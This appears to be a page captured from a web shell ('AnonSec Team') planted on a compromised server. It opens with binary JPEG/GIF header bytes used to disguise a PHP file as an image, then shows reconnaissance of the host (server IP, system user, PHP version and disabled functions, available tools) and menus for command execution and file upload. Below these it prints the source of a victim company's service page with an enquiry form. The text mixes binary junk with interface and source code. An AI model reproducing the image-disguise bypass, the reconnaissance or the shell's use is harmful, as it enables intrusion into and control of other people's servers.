����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 18.227.52.200
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/admin/assets/../../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/admin/assets/../../nonvoiceprocess.php
<head>
    <meta charset="UTF-8">
     <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta name="description" content="Discover a non-voice services in Nagpur with our specialized company. From non voice services
support, we offer comprehensive solutions tailored to your needs." />
    
    <meta name="keywords" content="non voice service company in nagpur, non voice services, non voice service provider, non voice services companies in nagpuur, outsource non voice services, non voice services provider" />
    <!-- ======== Page title ============ -->
    <title>Top Leading Nagpur Non-Voice Service Company | Vflyorions </title>
    
    <link rel="canonical" href="https://vflyorions.com/nonvoiceprocess"/>
</head>

<?php
$pages = 'services';
$page = 'nonvoiceprocess';
include 'header.php';
if(isset($_POST['inq']))
{
    $name=$_POST['name'];
    $email=$_POST['email'];
    $phone=$_POST['phone'];
    $message=$_POST['message'];
    
    $ins=$conn->prepare("INSERT INTO voice_enquiries (`name`,`email`,`phone`,`message`) VALUES(?,?,?,?)");
    $ins->bind_param("ssss",$name,$email,$phone,$message);
    $res=$ins->execute();
     if($res)
       {
              $_SESSION['status']="Send Successfully";
               $_SESSION['status_code']="success";
       }
       else
       {
               $_SESSION['status']="Oops something went wrong!!";
               $_SESSION['status_code']="error";
       }   
}
?>

<style>
    
.pop{
    border-style: solid; 
    /*border-width: 1px; */
    /*padding:2px !important; */
    margin-bottom:5px;
    border-radius:5px;
    /*background:black;*/
}


.popup-link{
  display:flex;
  flex-wrap:wrap;
}

.popup-link a{
    background: #333;
    color: #fff;
    padding: 10px 30px;
    border-radius: 5px;
    font-size:17px;
    cursor:pointer;
    margin:20px;
    text-decoration:none;
}

.popup-container {
    visibility: hidden;
    opacity: 0;
    transition: all 0.3s ease-in-out;
    transform: scale(1.3);
    position: fixed;
    z-index: 1;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(21, 17, 17, 0.61);
    display: flex;
    align-items: center;
}
.popup-content {
    /*background-color: #fefefe;*/
    margin: auto;
    padding: 20px;
    border: 1px solid #888;
    width: 50%;
}
.popup-content p{
    font-size: 17px;
    padding: 10px;
    line-height: 20px;
}
.popup-content a.close{
    color: #aaaaaa;
    float: right;
    font-size: 28px;
    font-weight: bold;
    background: none;
    padding: 0;
    margin: 0;
    text-decoration:none;
}

.popup-content a.close:hover{
  color:#333;
}

.popup-content span:hover,
.popup-content span:focus {
    color: #000;
    text-decoration: none;
    cursor: pointer;
}

.popup-container:target{
  visibility: visible;
  opacity: 1;
  transform: scale(1);
}


@media(max-width:769px){
    .popup-content {
    width: -webkit-fill-available;
    margin: 0 20px;
    }
    .contact-padding{
        padding:0px !important;
    }
   
}

 .contact-form input, .contact-form textarea{
        /*padding: 14px 30px !important;*/
    }

.contact-form textarea {
    height: 100px !important;
}

.contact-form input[type=submit], .contact-form .submit-btn {
    background: #FF5E14;
    color: #fff;
    font-weight: 700;
    line-height: 1;
    padding: 15px;
    -webkit-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
    width: 145px;
    text-transform: uppercase;
    font-family: "Exo 2", sans-serif;
    font-size: 14px;
}
</style>


    <div class="page-banner-wrap bg-cover" style="background-image: url('assets/img/allbanner.png')">
        <div class="container">
            <div class="row">
                <div class="col-12 col-lg-12">
                    <div class="page-heading text-white">
                        <h1>Non Voice Process </h1>
                    </div>
                    <div class="breadcrumb-wrap">
                        <nav>
                            <ol class="breadcrumb">
                              <li class="breadcrumb-item"><a href="index.php">Home</a></li>
                              <li class="breadcrumb-item active" aria-current="page">Non Voice Process</li>
                            </ol>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>

     <section class="our-service-wrapper section-padding bg-gray">
          
        <div class="container">
           <center><h2>A PARTNER YOU CAN RELY ON FOR
DOMESTIC AND INTERNATIONAL SALES
PROCESSES</h2></center><br>
            <div class="row mtm-30">
                <div class="col-md-6 col-12 col-lg-4 mt-30">
                    <div class="single-service-box style-1" style="height:auto;">
                        <div class="service-bg bg-cover" style="background-image: url('assets/img/callcenter.png')"></div>
                        <div class="icon">
                       <i class='fa fa-keyboard'></i>
                        </div>
                        <div class="contents">
                            <h4>Data Entry Services</h4>
                            <p style="text-align:justify">Well-organized and error-free data is the secret to increasing your company's growth.
Data entry is a time-consuming, monotonous process that is frequently overlooked.
Managing an internal team of data entry operators might be challenging, leaving you
with little time for your primary business operations.</p>
                        </div>
                        <br><br><br>
                        <div>
                            <center>
                               <a href="non_voice_details.php?id=1"><button class="course-btn"  type="submit">View More</button></a>     <a href="#popup1"><button class="course-btn " type="submit">Enquiry</button></a> 
                            </center>
                        </div>
                    </div>
                </div>
                <div class="col-md-6 col-12 col-lg-4 mt-30">
                    <div class="single-service-box style-1" style="height:auto;">
                        <div class="service-bg bg-cover" style="background-image: url('assets/img/callcenter.png')"></div>
                        <div class="icon">
                             <i class='fa fa-id-card'></i>
                        </div>
                        <div class="contents">
                            <h4>Non-Voice Services</h4>
                            <p style="text-align:justify">Non-voice-based BPO call center operations are jobs that often don't require direct
interaction or voice but instead lead with knowledge; examples of such professions
are payroll or analyst positions that may involve computer work.
</p>
                        </div>
                       <br><br><br><br><br>
                        <div>
                            <center>
                               <a href="non_voice_details.php?id=2"><button class="course-btn"  type="submit">View More</button></a>     <a href="#popup1"><button class="course-btn " type="submit">Enquiry</button></a> 
                            </center>
                        </div>
                    </div>
                </div>
                <div class="col-md-6 col-12 col-lg-4 mt-30">
                    <div class="single-service-box style-1" style="height:auto;">
                        <div class="service-bg bg-cover" style="background-image: url('assets/img/callcenter.png')"></div>
                        <div class="icon">
                         <i class='fa fa-exchange'></i>
                        </div>
                        <div class="contents">
                            <h4>Data Conversion Services</h4>
                            <p style="text-align:justify">You can use the free Data Conversion Service when examining and printing specific
files. You must use the Data Conversion Service to print Microsoft Office files. When
you use the Data Conversion Service, a server on the Internet that converts the data is
connected to you. Vflyorions is a call center support service in India.
</p>
                        </div>
                        <br><br>
                        <div>
                            <center>
                               <a href="non_voice_details.php?id=3"><button class="course-btn"  type="submit">View More</button></a>     <a href="#popup1"><button class="course-btn " type="submit">Enquiry</button></a> 
                            </center>
                        </div>
                    </div>
                </div>
                <div class="col-md-6 col-12 col-lg-4 mt-30">
                    <div class="single-service-box style-1" style="height:auto;">
                        <div class="service-bg bg-cover" style="background-image: url('assets/img/callcenter.png')"></div>
                        <div class="icon">
                       <i class='fa fa-search'></i>
                        </div>
                        <div class="contents">
                            <h4>Data Mining Research Services</h4>
                            <p style="text-align:justify">Top Call Center Companies employ data mining to transform unstructured data into
useful information. Businesses can interact with consumers to create more successful
marketing campaigns, boost sales, and cut expenses by employing software to seek
patterns in massive volumes of data.</p>
                        </div>
                    <br><br><br><br>
                        <div>
                            <center>
                               <a href="non_voice_details.php?id=4"><button class="course-btn"  type="submit">View More</button></a>     <a href="#popup1"><button class="course-btn " type="submit">Enquiry</button></a> 
                            </center>
                        </div>
                    </div>
                </div>
                <div class="col-md-6 col-12 col-lg-4 mt-30">
                    <div class="single-service-box style-1" style="height:auto;">
                        <div class="service-bg bg-cover" style="background-image: url('assets/img/callcenter.png')"></div>
                        <div class="icon">
                      <i class='fa fa-desktop'></i>
                        </div>
                        <div class="contents">
                            <h4>Online Typing Services</h4>
                            <p style="text-align:justify">Due to the fundamental requirement for transforming paper documents into digital
form and dissemination on web platforms, digital typing services are necessary for
any organization. It takes a lot of time and effort to type data online. Therefore, you
may save a lot of time by using call center outsourcing services or outbound call
centers</p>
                        </div>
                       <br><br><br>
                        <div>
                            <center>
                               <a href="non_voice_details.php?id=5"><button class="course-btn"  type="submit">View More</button></a>     <a href="#popup1"><button class="course-btn " type="submit">Enquiry</button></a> 
                            </center>
                        </div>
                    </div>
                </div>
                   <div class="col-md-6 col-12 col-lg-4 mt-30">
                    <div class="single-service-box style-1" style="height:auto;">
                        <div class="service-bg bg-cover" style="background-image: url('assets/img/callcenter.png')"></div>
                        <div class="icon">
                       <i class='fa fa-search'></i>
                        </div>
                        <div class="contents">
                            <h4>Data Research</h4>
                            <p style="text-align:justify">Data research in a non-voice process involves collecting, analyzing, and interpreting
data without relying on spoken communication. It typically includes tasks such as
gathering information from various sources, entering data into databases or
spreadsheets, analyzing datasets using statistical or analytical tools, and presenting
findings through written reports or visualizations.</p>
                        </div>
                     <br><br>
                        <div>
                            <center>
                               <a href="non_voice_details.php?id=6"><button class="course-btn"  type="submit">View More</button></a>     <a href="#popup1"><button class="course-btn " type="submit">Enquiry</button></a> 
                            </center>
                        </div>
                    </div>
                </div>
             
             
                 
            </div>
        </div>
    </section>

    <section class="pricing-cta-wrapper text-white bg-cover bg-center section-padding" style="background-image: url('assets/img/banner-contact1.png')">
        <div class="container">
            <div class="row">
                <div class="col-12 text-center col-xl-8 offset-xl-2 col-lg-10 offset-lg-1 ps-xl-0 pe-xl-0">
                    <div class="pricing-contents">
                        <h1>We Offer The Renovating Services</h1>
                        <div class="btn-wrapper d-flex align-items-end justify-content-center">
                            <a href="contact.php">Contact Us</a>
                            <div class="btn-cta">
                                <div class="icon">
                                    <i class="flaticon-24-hours"></i>
                                </div>
                                <div class="content">
                                    <span class="text-star">Call for support</span>
                                    <h3>+91 9146902678 / +91 8956375911</h3>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

  <br>
 <br>
 
 
 
 
 
 
 
 <div id="popup1" class="popup-container">
  <div class="popup-content section-title">
    <a href="#" class="close">&times;</a>
    <h2><center>Embark on a journey with us !</center></h2>
     <div class="contact-us-wrapper ">
        <div class="container">
            <div class="row eq-height">
                <div class="col-lg-12 col-12" >
                    <div class="contact-form contact-padding" style="backgroung-color:none;">                                                     
                        <form  method="POST" class="row">
                           
                <div class="form-group pop">
                    <!--<label for="name">Name:</label>-->
                    <input type="text" class="form-control" id="name" name="name" placeholder="Enter your name" style="margin:0px" required>
                </div>
                
                <div class="form-group pop">
                    <!--<label for="email">Email:</label>-->
                    <input type="email" class="form-control" id="email" name="email" placeholder="Enter your email" style="margin:0px" required>
                </div>
                
                <div class="form-group pop">
                    <!--<label for="phone">Phone:</label>-->
                    <input type="tel" class="form-control" id="phone" name="phone" placeholder="Enter your phone number" style="margin:0px" required>
                </div>
                
                <div class="form-group pop">
                    <!--<label for="message">Message:</label>-->
                    <textarea class="form-control" id="message" name="message" rows="5" placeholder="Enter your message" required></textarea>
                </div>
                                                  
                            <div></div>
                          <div class="form-group pop">
                                <center><input class="submit-btn" name="inq" type="submit" value="Send"></center>
                            </div>                                      
                        </form>
                        <span class="form-message"></span>
                    </div>
                </div>
            </div>
        </div>
    </div>
   </div>
</div>
 <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
<?php  if(isset($_SESSION['status']) && $_SESSION['status']!='') { ?>
<script>
   new swal({
   title: "<?php echo $_SESSION['status'];?>",
   //text: "You clicked the button!",
   icon: "<?php echo $_SESSION['status_code'];?>",
   button: "OK",
   }).then(function() {
   window.location = "";
   });
</script>
<?php
   unset($_SESSION['status']);
   }
   ?> 
<?php
include 'footer.php';
?>

AnonSec - 2021